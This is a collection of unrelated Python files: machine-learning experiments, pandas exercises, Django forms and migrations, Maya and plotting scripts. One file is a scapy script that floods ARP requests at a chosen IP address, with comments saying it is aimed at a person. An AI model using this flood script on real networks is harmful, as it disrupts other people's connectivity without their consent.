mask = self.labels_ == j
if np.sum(mask) == 0:
raise ValueError("Empty cluster found, try smaller n_cluster.")
denom = sw[mask].sum()
denomsq = denom * denom
if update_within:
KK = K[mask][:, mask]
dist_j = np.sum(np.outer(sw[mask], sw[mask]) * KK / denomsq)
within_distances[j] = dist_j
dist[:, j] += dist_j
else:
dist[:, j] += within_distances[j]
dist[:, j] -= 2 * np.sum(sw[mask] * K[:, mask], axis=1) / denom #calculating distance of each point from centroid of cluster j by finding
#diff. b/w centroid of cluster j & similarity of it with points in cluster j
def predict(self, X):
'''Uses the model calculated to predict for each document the closest cluster it belongs to'''
K = self._get_kernel(X, self.X_fit_)
n_samples = X.shape[0]
dist = np.zeros((n_samples, self.n_clusters))
self._compute_dist(K, dist, self.within_distances_,update_within=False)
return dist.argmin(axis=1)
def main():
true_k = 4
labels = []
training_set = []
path = os.getcwd()+'/classicdocs/classic/'
for file in glob.glob(os.path.join(path, '*')):
data = ""
for line in open(file) :
data += line
training_set.append(data)
if 'cacm' in str(file):
labels.append(0)
elif 'cisi' in str(file):
labels.append(1)
elif 'cran' in str(file):
labels.append(2)
elif 'med' in str(file):
labels.append(3)
n_components = 20
print 'Total Samples',len(training_set)
print("Extracting features from the training dataset using a sparse vectorizer")
# Perform an IDF normalization on the output of HashingVectorizer
'''It turns a collection of text documents into a scipy.sparse matrix holding token occurrence counts
This text vectorizer implementation uses the hashing trick to find the token string name to feature integer index mapping.'''
hasher = HashingVectorizer(stop_words='english', non_negative=True,norm=None, binary=False)
'''Transform a count matrix to a normalized tf-idf representation. It provides IDF weighting.'''
vectorizer = make_pipeline(hasher, TfidfTransformer(norm='l2', smooth_idf=True, sublinear_tf=False, use_idf=True))
X = vectorizer.fit_transform(training_set)
if n_components:
print("Performing dimensionality reduction using SVD")
'''This transformer performs linear dimensionality reduction by means of singular value decomposition (SVD)'''
svd = TruncatedSVD(n_components)
lsa = make_pipeline(svd, Normalizer(copy=False))
X = lsa.fit_transform(X)
km = KernelKMeans(n_clusters= 5, max_iter=100, verbose=1)
km.fit_predict(X)
predict = km.predict(X)
print 'Adjusted_Rand_Score',metrics.adjusted_rand_score(labels, predict)
print 'Mutual Info',metrics.adjusted_mutual_info_score(labels, predict)
print("Homogeneity: %0.3f" % metrics.homogeneity_score(labels, predict))
if __name__ == '__main__':
main()
|
993,433 | 587936592b2de26a97be21ae06024583e8958101 | # 1.
print("Output of 1st program is: ")
import pandas as pd
d=pd.DataFrame([5,2,4,8])
print(d)
print(d[0])
# 2.
print("\n\nOutput of 2nd Program is: ")
d=pd.DataFrame({'a':[5,2,4,8]})
print(d)
# 3.
print("\n\nOutput of 3rd Program is: ")
print(d['a'][1])
# 4.
print("\n\nOutput of 4th Program is: ")
d=pd.DataFrame({'a':[5,2,4,8],'b':[4,8,5,2]})
print(d)
# 5.
print("Output of 5th Program is: ")
print(d['a'][1])
print("\n",d['b'][1])
# 6.
print("Output of 6th Program is: ")
D=d.T
print(D,"\n")
print(D[1],"\n")
print("Shape is: ",D.shape)
print("Dimension is: ",D.ndim)
print("Size is: ",D.size)
# 7.
print("\n\nOutput of 7th Program is: ")
d=pd.DataFrame([[5,2,4,8],[4,8,5,2]],columns=['a','b','c','d'],index=['abc','xyz'])
print(d)
# 8.
print("\n\nOutput of 8th Program is: ")
print(d['b'][1])
print(d['b'][0])
print(d['c'][0])
print(d['c'][1])
print(d[['b','c']],"\n")
d['e']=d['c']+d['d']
print(d,"\n")
m=d[{'a','b'}]
print(m,'\n')
print("Type of m is: ",type(m))
# 9.
print("\n\nOutput of 9th Program is: ")
print(d[:],"\n")
print(d[0:1],"\n")
print(d[1:2],"\n")
print(d['a'][0:2],"\n")
print(d['a'][0:1],"\n")
print(d['a':'b'][0:1],"\n")
print(d[0:2][0:1],"\n")
print(d[{'a','b'}][0:1],"\n")
print(d[['a','b']][0:1],"\n")
print(d.T)
# 10.
##
##d1=pd.DataFrame([[5,2,4,8],[4,8,5,2]],columns=['a','b','c','d'],index=['a','b'])
##d2=pd.DataFrame([[4,8,5,2],[45,2,4,8]],columns=['a','b','c','d'],index=['a','b'])
##s=d.add(d1,d2)
##print(s)
# 11.
import numpy as np
print("Output of 11th Program is : ")
a=np.arange(50).reshape(5,10)
d=pd.DataFrame(a)
print(d,"\n\n")
d=pd.DataFrame(a,columns=['a','b','c','d','e','f','g','h','i','j'],index=['a','b','c','d','e'])
print(d,"\n")
print(d[['b','c']][0:2],"\n")
print(d[['b','c']][0:],"\n")
print(d[['b','c']][0:4],"\n")
print(d[['b','c']][0:2].sum(),"\n")
print(d.columns,"\n")
print(d.index,"\n")
print(d.iloc(0),"\n")
print(d[0:1],"\n")
print(d.iloc[0:3])
|
993,434 | 1bd34ce0f0ec2d0dc94e2b3c1dd4c7ae4e0927df | import numpy as np
def fit(X_train, Y_train) :
result = {}
class_values = set(Y_train)
for current_class in class_values :
result[current_class] = {}
result["total_data"] = len(Y_train)
current_class_rows = (Y_train==current_class)
X_train_current = X_train[current_class_rows]
Y_train_current = Y_train[current_class_rows]
num_features = X_train.shape[1]
result[current_class]['total_count'] = len(Y_train_current)
for j in range(1, num_features + 1) :
result[current_class][j] = {}
all_possible_values = set(X_train[:, j])
for current_value in all_possible_values:
result[current_class][j][current_value] = (X_train_current[:, j] == current_value).sum()
|
993,435 | e4a6fb40f325c69cf63e7c1e3bf8b6fbf46c6ac4 | # Generated by Django 2.2.4 on 2021-08-24 10:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('objects', '0003_auto_20210823_1430'),
('dispatching', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='event',
name='iptv',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='event_iptv', to='objects.IPTV', verbose_name='Каналы IPTV'),
),
migrations.AddField(
model_name='historicalevent',
name='iptv',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='objects.IPTV', verbose_name='Каналы IPTV'),
),
]
|
993,436 | c4f62970a60a784fe1852a8231d0b58f5136a34f | print "Hello, world, I am not becoming a Git Ninja" |
993,437 | dfdc3495e93a3ff16d18535b2e0b5b9e45ea8482 | # OK
# https://www.machinelearningplus.com/nlp/text-summarization-approaches-nlp-example/
# sudo pip3 install gensim
# pip3 show gensim | grep Version
# sudo pip3 install -U gensim
# sudo python3 -m pip install -U gensim
# sudo pip install gensim --user
# sudo pip3 install --upgrade gensim
# python3 -m pip install gensim
# pip freeze | grep gensim
# fix for ModuleNotFoundError: No module named 'gensim.summarization'
# https://discuss.streamlit.io/t/no-module-named-gensim-summarization/11780/2
# sudo pip3 install gensim==3.8.3
"""
import sys, os
# */site-packages is where your current session is running its python out of
site_path = ''
for path in sys.path:
if 'site-packages' in path.split('/')[-1]:
print(path)
site_path = path
# search to see if gensim in installed packages
if len(site_path) > 0:
if not 'gensim' in os.listdir(site_path):
print('package not found')
else:
print('gensim installed')
"""
original_text = 'Junk foods taste good that’s why it is mostly liked by everyone of any age group especially kids and ' \
'school going children. They generally ask for the junk food daily because they have been trend so by ' \
'their parents from the childhood. They never have been discussed by their parents about the harmful ' \
'effects of junk foods over health. According to the research by scientists, it has been found that ' \
'junk foods have negative effects on the health in many ways. They are generally fried food found in ' \
'the market in the packets. They become high in calories, high in cholesterol, low in healthy ' \
'nutrients, high in sodium mineral, high in sugar, starch, unhealthy fat, lack of protein and lack of ' \
'dietary fibers. Processed and junk foods are the means of rapid and unhealthy weight gain and ' \
'negatively impact the whole body throughout the life. It makes able a person to gain excessive ' \
'weight which is called as obesity. Junk foods tastes good and looks good however do not fulfil the ' \
'healthy calorie requirement of the body. Some of the foods like french fries, fried foods, pizza, ' \
'burgers, candy, soft drinks, baked goods, ice cream, cookies, etc are the example of high-sugar and ' \
'high-fat containing foods. It is found according to the Centres for Disease Control and Prevention ' \
'that Kids and children eating junk food are more prone to the type-2 diabetes. In type-2 diabetes ' \
'our body become unable to regulate blood sugar level. Risk of getting this disease is increasing as ' \
'one become more obese or overweight. It increases the risk of kidney failure. Eating junk food daily ' \
'lead us to the nutritional deficiencies in the body because it is lack of essential nutrients, ' \
'vitamins, iron, minerals and dietary fibers. It increases risk of cardiovascular diseases because it ' \
'is rich in saturated fat, sodium and bad cholesterol. High sodium and bad cholesterol diet increases ' \
'blood pressure and overloads the heart functioning. One who like junk food develop more risk to put ' \
'on extra weight and become fatter and unhealthier. Junk foods contain high level carbohydrate which ' \
'spike blood sugar level and make person more lethargic, sleepy and less active and alert. Reflexes ' \
'and senses of the people eating this food become dull day by day thus they live more sedentary life. ' \
'Junk foods are the source of constipation and other disease like diabetes, heart ailments, ' \
'clogged arteries, heart attack, strokes, etc because of being poor in nutrition. Junk food is the ' \
'easiest way to gain unhealthy weight. The amount of fats and sugar in the food makes you gain weight ' \
'rapidly. However, this is not a healthy weight. It is more of fats and cholesterol which will have a ' \
'harmful impact on your health. Junk food is also one of the main reasons for the increase in obesity ' \
'nowadays.This food only looks and tastes good, other than that, it has no positive points. The ' \
'amount of calorie your body requires to stay fit is not fulfilled by this food. For instance, ' \
'foods like French fries, burgers, candy, and cookies, all have high amounts of sugar and fats. ' \
'Therefore, this can result in long-term illnesses like diabetes and high blood pressure. This may ' \
'also result in kidney failure. Above all, you can get various nutritional deficiencies when you ' \
'don’t consume the essential nutrients, vitamins, minerals and more. You become prone to ' \
'cardiovascular diseases due to the consumption of bad cholesterol and fat plus sodium. In other ' \
'words, all this interferes with the functioning of your heart. Furthermore, junk food contains a ' \
'higher level of carbohydrates. It will instantly spike your blood sugar levels. This will result in ' \
'lethargy, inactivates, and sleepiness. A person reflex becomes dull overtime and they lead an ' \
'inactive life. To make things worse, junk food also clogs your arteries and increases the risk of a ' \
'heart attack. Therefore, it must be avoided at the first instance to save your life from becoming ' \
'ruined.The main problem with junk food is that people don’t realize its ill effects now. When the ' \
'time comes, it is too late. Most importantly, the issue is that it does not impact you instantly. It ' \
'works on your overtime; you will face the consequences sooner or later. Thus, it is better to stop ' \
'now.You can avoid junk food by encouraging your children from an early age to eat green vegetables. ' \
'Their taste buds must be developed as such that they find healthy food tasty. Moreover, try to mix ' \
'things up. Do not serve the same green vegetable daily in the same style. Incorporate different ' \
'types of healthy food in their diet following different recipes. This will help them to try foods at ' \
'home rather than being attracted to junk food.In short, do not deprive them completely of it as that ' \
'will not help. Children will find one way or the other to have it. Make sure you give them junk food ' \
'in limited quantities and at healthy periods of time. '
# Importing package and summarizer
"""original_text = 'The conversation Sam Harris what are the most influential and pioneering thinkers of our time hes
a host of The Making Sense podcast and the author of many similar books and human nature and the human mind including
the end of Faith the moral landscape lying free will and waking up. He also has a meditation app called waking up and
Ive been using to guide my own meditation. ' """
import gensim
from gensim.summarization import summarize
# Passing the text corpus to summarizer
short_summary = summarize(original_text)
print(short_summary)
print("--------------")
# Summarization by ratio
summary_by_ratio = summarize(original_text, ratio=0.05)
print(summary_by_ratio)
print("--------------")
# Summarization by word count
summary_by_word_count = summarize(original_text, word_count=30)
print(summary_by_word_count)
print("--------------")
# Summarization when both ratio & word count is given
summary = summarize(original_text, ratio=0.1, word_count=30)
print(summary)
|
993,438 | a3b19f02a72320a0f15e090ec5b63f9cc225beaa | # Write a Python function to create the HTML string with tags around the word(s).
# Sample function and result :
# add_tags('i', 'Python') -> '<i>Python</i>'
# add_tags('b', 'Python Tutorial') -> '<b>Python Tutorial </b>'
def add_tags(tag, message):
return "<{tag}>{message}</{tag}>".format(tag=tag, message=message)
print(add_tags('b', 'python testo'))
|
993,439 | d73472a15cb29dcc0202043d2bcf4b31a6a13e56 | import simplejson as json
from flask_wtf import Form
from wtforms import StringField, IntegerField, SelectField
from wtforms.widgets import TextInput, FileInput, HiddenInput
from wtforms.validators import Required, Optional, NumberRange, Length, Regexp
import logging
log = logging.getLogger(__name__)
# If present, rule alias' must be a string containing at least one non-numeric character.
RULE_ALIAS_REGEXP = "(^[a-zA-Z][a-zA-Z0-9-]*$|^$)"
class DisableableTextInput(TextInput):
"""A TextInput widget that supports being disabled."""
def __init__(self, disabled, *args, **kwargs):
self.disabled = disabled
TextInput.__init__(self, *args, **kwargs)
def __call__(self, *args, **kwargs):
if self.disabled:
kwargs['disabled'] = 'disabled'
return TextInput.__call__(self, *args, **kwargs)
class JSONStringField(StringField):
"""StringField that parses incoming data as JSON."""
def process_formdata(self, valuelist):
if valuelist and valuelist[0]:
try:
self.data = json.loads(valuelist[0])
# XXX: use JSONDecodeError when the servers support it
except ValueError as e:
# WTForms catches ValueError, which JSONDecodeError is a child
# of. Because of this, we need to wrap this error in something
# else in order for it to be properly raised.
log.debug('Caught ValueError')
self.process_errors.append(e.args[0])
else:
log.debug('No value list, setting self.data to default')
self._set_default()
def _set_default(self):
self.data = {}
def _value(self):
return json.dumps(self.data) if self.data is not None else u''
class NullableStringField(StringField):
"""StringField that parses incoming data converting empty strings to None's."""
def process_formdata(self, valuelist):
if valuelist and valuelist[0]:
if valuelist[0] == '':
log.debug("data is empty string, setting it to NULL")
self.data = None
else:
self.data = valuelist[0]
else:
log.debug('No value list, setting self.data to None')
self.data = None
def NoneOrType(type_):
"""A helper method for SelectField's that returns the value coerced to
the specified type when it is not None. By default, a SelectField coerces
None to unicode, which ends up as u'None'."""
def coercer(value):
if value is None:
return value
else:
return type_(value)
return coercer
class DbEditableForm(Form):
data_version = IntegerField('data_version', validators=[Required()], widget=HiddenInput())
class NewPermissionForm(Form):
options = JSONStringField('Options')
class ExistingPermissionForm(DbEditableForm):
options = JSONStringField('Options')
class PartialReleaseForm(Form):
# Because we do implicit release creation in the Releases views, we can't
# have data_version be Required(). The views are responsible for checking
# for its existence in this case.
data_version = IntegerField('data_version', widget=HiddenInput())
product = StringField('Product', validators=[Required()])
hashFunction = StringField('Hash Function')
data = JSONStringField('Data', validators=[Required()])
schema_version = IntegerField('Schema Version')
copyTo = JSONStringField('Copy To', default=list)
alias = JSONStringField('Alias', default=list)
class RuleForm(Form):
backgroundRate = IntegerField('Background Rate', validators=[Required(), NumberRange(0, 100)])
priority = IntegerField('Priority', validators=[Required()])
mapping = SelectField('Mapping', validators=[])
alias = NullableStringField('Alias', validators=[Length(0, 50), Regexp(RULE_ALIAS_REGEXP)])
product = NullableStringField('Product', validators=[Length(0, 15)])
version = NullableStringField('Version', validators=[Length(0, 10)])
buildID = NullableStringField('BuildID', validators=[Length(0, 20)])
channel = NullableStringField('Channel', validators=[Length(0, 75)])
locale = NullableStringField('Locale', validators=[Length(0, 200)])
distribution = NullableStringField('Distribution', validators=[Length(0, 100)])
buildTarget = NullableStringField('Build Target', validators=[Length(0, 75)])
osVersion = NullableStringField('OS Version', validators=[Length(0, 1000)])
distVersion = NullableStringField('Dist Version', validators=[Length(0, 100)])
whitelist = NullableStringField('Whitelist', validators=[Length(0, 100)])
comment = NullableStringField('Comment', validators=[Length(0, 500)])
update_type = SelectField('Update Type', choices=[('minor', 'minor'), ('major', 'major')], validators=[])
headerArchitecture = NullableStringField('Header Architecture', validators=[Length(0, 10)])
class EditRuleForm(DbEditableForm):
backgroundRate = IntegerField('Background Rate', validators=[Optional(), NumberRange(0, 100)])
priority = IntegerField('Priority', validators=[Optional()])
mapping = SelectField('Mapping', validators=[Optional()], coerce=NoneOrType(unicode))
alias = NullableStringField('Alias', validators=[Optional(), Length(0, 50), Regexp(RULE_ALIAS_REGEXP)])
product = NullableStringField('Product', validators=[Optional(), Length(0, 15)])
version = NullableStringField('Version', validators=[Optional(), Length(0, 10)])
buildID = NullableStringField('BuildID', validators=[Optional(), Length(0, 20)])
channel = NullableStringField('Channel', validators=[Optional(), Length(0, 75)])
locale = NullableStringField('Locale', validators=[Optional(), Length(0, 200)])
distribution = NullableStringField('Distribution', validators=[Optional(), Length(0, 100)])
buildTarget = NullableStringField('Build Target', validators=[Optional(), Length(0, 75)])
osVersion = NullableStringField('OS Version', validators=[Optional(), Length(0, 1000)])
distVersion = NullableStringField('Dist Version', validators=[Optional(), Length(0, 100)])
whitelist = NullableStringField('Whitelist', validators=[Optional(), Length(0, 100)])
comment = NullableStringField('Comment', validators=[Optional(), Length(0, 500)])
update_type = SelectField('Update Type', choices=[('minor', 'minor'), ('major', 'major')], validators=[Optional()], coerce=NoneOrType(unicode))
headerArchitecture = NullableStringField('Header Architecture', validators=[Optional(), Length(0, 10)])
class CompleteReleaseForm(Form):
name = StringField('Name', validators=[Required()])
product = StringField('Product', validators=[Required()])
blob = JSONStringField('Data', validators=[Required()], widget=FileInput())
data_version = IntegerField('data_version', widget=HiddenInput())
|
993,440 | 26b6508f078ffdae3e558b4192d032f8247ae2d1 | class Solution(object):
def generateMatrix(self, n):
"""
:type n: int
:rtype: List[List[int]]
"""
if n == 0: return []
up, left = 0, 0
down, right = n - 1, n - 1
res = [[0 for i in range(n)] for j in range(n)]
direct,count = 0,0
while True: # Mistake for i in range(n*n):
if direct == 0:
for j in range(left, right+1):
count += 1; res[up][j] = count # Mistake count start from 1
up += 1
elif direct == 1:
for j in range(up, down+1):
count += 1;res[j][right] = count
right -= 1
elif direct == 2:
for j in range(right, left-1, -1):
count += 1;res[down][j] = count
down -= 1
elif direct == 3:
for j in range(down, up-1, -1):
count += 1;res[j][left] = count
left+=1
if up > down or left > right:
break
direct= (direct + 1) % 4
return res
s = Solution()
print(s.generateMatrix(3))
|
993,441 | f522229fb9b4265414fb64100f7b509f1d06c0ea | #!/usr/bin/python
# Days of Year
# Author: Thomas Perl
import datetime
today = datetime.datetime.now()
day_of_year = int(today.strftime('%j'))
print day_of_year
|
993,442 | 9744527ba91b6277206419a2d9e124ae628b8611 | from multiprocessing import Queue
class BufferManager:
def __init__(self):
self.percept_buffer = Queue()
self.action_buffer = Queue()
def read_percept(self):
return self.percept_buffer.get(True) if not self.percept_buffer.empty() else None
def write_percept(self, percept):
self.percept_buffer.put(percept, True)
def read_action(self):
return self.action_buffer.get(True) if not self.action_buffer.empty() else None
def write_action(self, action):
self.action_buffer.put(action, True)
|
993,443 | 08ef47ea1c063b7e30c1c158d7ceb9bd06ee00e9 | '''
Author:
Aaron Aikman
Date of Creation:
11/21/2017
Installation:
Put in scripts folder
Enter 'rehash' in the mel command line
Put the Shelf Button script into a python button
Shelf Button:
import AAikman_AddAttrToSel as aaAddAttrs
reload(aaAddAttrs)
aaAddAttrs.main()
Marking Menu Script:
python("import AAikman_AddAttrToSel as aaAddAttrs; reload(aaAddAttrs); aaAddAttrs.main();")
'''
import maya.cmds as cmds
def main():
sel = cmds.ls(sl=True)
for itm in sel:
cmds.select(itm, r=True)
# cmds.addAttr( longName='ArmorUp', attributeType='float', k=True, minValue=0, maxValue=10, defaultValue=0)
# cmds.addAttr( longName='ArmorUp_SideL', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
# cmds.addAttr( longName='ArmorUp_SideR', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
# cmds.addAttr( longName='ArmorUp_Visor3', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
# cmds.addAttr( longName='ArmorUp_Visor2', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
# cmds.addAttr( longName='ArmorUp_Visor1', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
# cmds.addAttr( longName='ArmorUp_JawUpper', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
# cmds.addAttr( longName='ArmorUp_JawLower', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
cmds.addAttr( longName='ControlVis_Armor', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=1)
cmds.addAttr( longName='ControlVis_Propulsion', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=1)
cmds.addAttr( longName='ControlVis_Grapple', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=1)
|
993,444 | cf6b400f0873ba8e41dd3adda3ac3b677fa4744e | import os
import sys
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from datetime import datetime
# === Day 2
tree1_loc = os.path.join(os.getcwd(), 'hft_group_project/datasets/day2', '25.csv')
tree1_data = pd.read_csv(tree1_loc)
tree2_loc = os.path.join(os.getcwd(), 'hft_group_project/datasets/day2', '130.csv')
tree2_data = pd.read_csv(tree2_loc)
tree3_loc = os.path.join(os.getcwd(), 'hft_group_project/datasets/day2', '300.csv')
tree3_data = pd.read_csv(tree3_loc)
# Day 2 ===
tree1 = pd.DataFrame(tree1_data, columns=tree1_data.columns.values)
# drop date col
tree1.drop('date', axis=1, inplace=True)
# convert datatype to numeric
tree1 = tree1.apply(pd.to_numeric, errors='coerce')
tree2 = pd.DataFrame(tree2_data, columns=tree2_data.columns.values)
# drop date col
tree2.drop('date', axis=1, inplace=True)
# convert datatype to numeric
tree2 = tree2.apply(pd.to_numeric, errors='coerce')
tree3 = pd.DataFrame(tree3_data, columns=tree3_data.columns.values)
# drop date col
tree3.drop('date', axis=1, inplace=True)
# convert datatype to numeric
tree3 = tree3.apply(pd.to_numeric, errors='coerce')
# calc avg of every column
tree1_mean = tree1.mean(axis=0)
tree2_mean = tree2.mean(axis=0)
tree3_mean = tree3.mean(axis=0)
f1 = plt.figure(figsize=(18, 16))
f1.suptitle("Tree with diameter 20-30cm", fontsize=14)
plt.style.use('ggplot')
# #tree 1
plot1 = plt.subplot(231)
tree1_mean.plot.bar(rot=0)
plot1.set_title('Averages')
plot2 = plt.subplot(232)
plt.plot(tree1["temperature"])
plot2.set_title('temperature')
plt.xlabel('data measurement points')
plt.ylabel('value')
plot3 = plt.subplot(233)
plt.plot(tree1["humidity"])
plot3.set_title('humidity')
plt.xlabel('data measurement points')
plt.ylabel('value')
plot4 = plt.subplot(234)
plt.plot(tree1["light"])
plot4.set_title('light')
plt.xlabel('data measurement points')
plt.ylabel('value')
plot5 = plt.subplot(235)
plt.plot(tree1["soil"])
plot5.set_title('soil moisture')
plt.xlabel('data measurement points')
plt.ylabel('value')
plot6 = plt.subplot(236)
plt.plot(tree1["air"])
plot6.set_title('air quality')
plt.xlabel('data measurement point')
plt.ylabel('value')
# #tree 2
# plot2 = plt.subplot(222)
# tree2_mean.plot.bar(rot=0)
# plot2.set_title('130-150cm')
# #tree 3
# plot3 = plt.subplot(223)
# tree3_mean.plot.bar(rot=0)
# plot3.set_title('200-300cm')
# # Day 2 ===
# #tree 4
# plot4 = plt.subplot(224)
# water_mean.plot.bar(rot=0)
# plot4.set_title('water/studio')
# f3 = plt.figure(3)
plt.show()
|
993,445 | 10ba373c3cef3bf516c0ecb8425522596719845a | from django import forms
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect, Http404
from homepage.models import *
from manager import models as mmod
from . import templater
from datetime import datetime
def process_request(request):
'''Sends an employee to the form for updating labor information on a repair'''
#Checks for an Authenticated User
if not request.user.is_authenticated():
return HttpResponseRedirect('/homepage/')
if not request.user.is_staff:
return HttpResponse('/homepage/')
#Gets the user BO
user = request.user
sr = mmod.ServiceRepair.objects.get(id=request.urlparams[0])
form = RepairWorkForm()
now = datetime.now()
if request.method == 'POST':
form = RepairWorkForm(request.POST)
if form.is_valid():
work_performed = form.cleaned_data['work_performed']
status = form.cleaned_data['status']
hours_worked = form.cleaned_data['hours_worked']
# charge_amount = form.cleaned_data['charge_amount']
if status == 'Finished':
sr.dateComplete = now
sr.status = status
sr.labor_hours += hours_worked
sr.save()
return HttpResponseRedirect('/manager/repair_details/')
template_vars = {
'user': user,
'sr': sr,
'form': form,
}
return templater.render_to_response(request, 'repair_work.html', template_vars)
class RepairWorkForm(forms.Form):
'''The repair work form is used for employees to describe the labor performed during a repair'''
status = forms.ChoiceField(widget = forms.Select(), choices = ([('Waiting for Parts','Waiting for Parts'), ('On Hold','On Hold'),('In Progress','In Progress'),('Finished','Finished'), ]))
hours_worked = forms.IntegerField()
work_performed = forms.CharField(required=False, label='', widget=forms.Textarea(attrs={'id':'laborBox','placeholder':'Description of labor performed'})) |
993,446 | 98d9b1ac46a2438e60a4e030c8fd8350563d24b0 | from scapy.all import *
from threading import Thread
import time
import sys
def generate_packets(dst_addr):
#ARP(op=2, pdst=dest_IP, psrc=spoof_IP, hwsrc=hwsrc)
pkt = ARP(op=1, pdst=dst_addr)
return pkt
def flood_packet(dst_addr, timeout=100):
print(dst_addr)
start_time = time.time()
while time.time() - start_time < timeout:
pkt = generate_packets(dst_addr)
sendp(pkt, verbose=False)
def start_attack(dst_addr):
try:
#print(type(dst_addr))
thread = Thread(target=flood_packet, args=(dst_addr,100))
thread.start()
except Exception as ex:
print(ex)
if __name__ == "__main__":
if(len(sys.argv) < 1):
print('Enter the IP of the fucker you wanna spam')
exit(0)
else:
try:
dst_addr = str(sys.argv[1])
print(f'Spamming {dst_addr} fucker')
start_attack(dst_addr)
except Exception as ex:
print(ex)
|
993,447 | 71aa5a06ea4edc6fed87c12a48a09e0c4f7d326b | def sumAll(n):
res = 0
i = 0
while i<=n:
res += i
i += 1
return res |
993,448 | 507d1d55b646bfed9194f1bdb301a025897004d9 | #!/bin/python
#Filename=using_file.py
poem='''\
Programming is fun
When the work is done
if you wanna make your work also fun:
use Python!
and funk
'''
#peng=file('test.txt','w') # if file no exist and it will creat new file
f=file('poem.txt','a') # open for wrinting
f.write(poem) # wrint text to file. at end ,add
f.writelines("so ga ba ge")
f.close() # close the file
f=file('poem.txt')
#if no mode is specified, 'r'ead mode is assumed by default
while True:
line=f.readline()
#line=f.read(3)
if len(line) == 0:
break
print line, # readline duquyihang bing fanhui huanghangfuhao ,bu jia , you ge konghanfu
# Notice comma to avoid automatic newline added by Python
f.close() # close the file
|
993,449 | b6a82100dcf8f622a2bcc23c3990043a7730d9af | from django import forms
from .models import *
from django.core.exceptions import ValidationError
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.contrib.auth import get_user_model
from django.forms import modelformset_factory
class CustomUserCreationForm(forms.Form):
username = forms.CharField(label='Enter Username', min_length=4, max_length=150)
email = forms.EmailField(label='Enter email')
password1 = forms.CharField(label='Enter password', widget=forms.PasswordInput)
password2 = forms.CharField(label='Confirm password', widget=forms.PasswordInput)
def clean_username(self):
User = get_user_model()
username = self.cleaned_data['username'].lower()
r = User.objects.filter(username=username)
if r.count():
raise ValidationError("Username already exists")
return username
def clean_email(self):
User = get_user_model()
email = self.cleaned_data['email'].lower()
r = User.objects.filter(email=email)
if r.count():
raise ValidationError("Email already exists")
return email
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 and password2 and password1 != password2:
raise ValidationError("Password don't match")
return password2
def save(self, commit=True):
User = get_user_model()
user = User.objects.create_user(
self.cleaned_data['username'],
self.cleaned_data['email'],
self.cleaned_data['password1']
)
return user
class ApplyForm(forms.ModelForm):
class Meta:
model = ApplyPositions
fields = ('__all__')
class PersonalForm(forms.ModelForm):
class Meta:
User = get_user_model()
model = User
fields = ('__all__')
class EducationalForm(forms.ModelForm):
class Meta:
model = Course
fields = ('__all__')
exclude = ('Applicant',)
EducationalFormSet = modelformset_factory(Course, form=EducationalForm, extra=2)
class IndustrialForm(forms.ModelForm):
class Meta:
model = IndustrialExperience
fields = ('__all__')
exclude = ('faculty',)
IndustrialFormSet = modelformset_factory(IndustrialExperience, form=IndustrialForm, extra=1)
class TeachingForm(forms.ModelForm):
class Meta:
model = TeachingExperience
fields = ('__all__')
exclude = ('faculty',)
TeachingFormSet = modelformset_factory(TeachingExperience, form=TeachingForm, extra=1)
class ResearchForm(forms.ModelForm):
class Meta:
model = Research
fields = ('__all__')
exclude = ('faculty',)
ResearchFormSet = modelformset_factory(Research, form=ResearchForm, extra=1)
class MembershipForm(forms.ModelForm):
class Meta:
model = Membership
fields = ('__all__')
exclude = ('faculty',)
MembershipFormSet = modelformset_factory(Membership, form=MembershipForm, extra=1)
class ConferenceForm(forms.ModelForm):
class Meta:
model = Conference
fields = ('__all__')
exclude = ('faculty',)
ConferenceFormSet = modelformset_factory(Conference, form=ConferenceForm, extra=1)
class AwardForm(forms.ModelForm):
class Meta:
model = Awards
fields = ('__all__')
exclude = ('faculty',)
class ReferenceForm(forms.ModelForm):
class Meta:
model = Referral
fields = ('__all__')
exclude = ('faculty',)
ReferenceFormSet = modelformset_factory(Referral, form=ReferenceForm, extra=1)
class AchievementForm(forms.ModelForm):
class Meta:
model = SpecialAchievement
fields = ('__all__')
exclude = ('faculty',)
AchievementFormSet = modelformset_factory(SpecialAchievement, form=AchievementForm, extra=1)
class PayementForm(forms.ModelForm):
class Meta:
User = get_user_model()
model = User
fields = ('__all__')
class DocumentsForm(forms.ModelForm):
class Meta:
model = DocumentUpload
fields = ('__all__')
exclude = ('uploaded_by',)
DocumentsFormSet = modelformset_factory(DocumentUpload, form=DocumentsForm, extra=1)
class DeclarationForm(forms.ModelForm):
class Meta:
model = Declaration
fields = ('__all__')
exclude = ('faculty',) |
993,450 | c4b8028af65097671723489df5274aa40bcc33a9 | #!/usr/bin/env python3
# seekf.py - seek and modify file
import sys
if (len(sys.argv) < 4):
sys.stderr.write("Usage: seekf.py filename color shade\n")
exit(1)
# your code here...
###############################################
#
# $ seekf.py colors yellow 6.6
#
# $ readf.py colors
# blue 4.4
# indigo 2.3
# yellow 6.6
# green 3.6
# violet 4.7
# orange 1.2
# red 6.2
#
|
993,451 | ee47cdf94ba6a9169ce8107b52e14c955237cc07 | from django.shortcuts import render
from django.contrib.auth.models import User
def main(request):
return render(request, 'main.html', {}) |
993,452 | e0ce356b3dabb392f44420594564a0d1e657fb95 | #############################
# #
# Alexander Chick #
# #
# copyright 2015 #
# #
#############################
"""
This program creates 50 * 50 = 2500 test interaction objects
in the "zE0001R1" table in Parse.
Data members for each Round 1 interaction object:
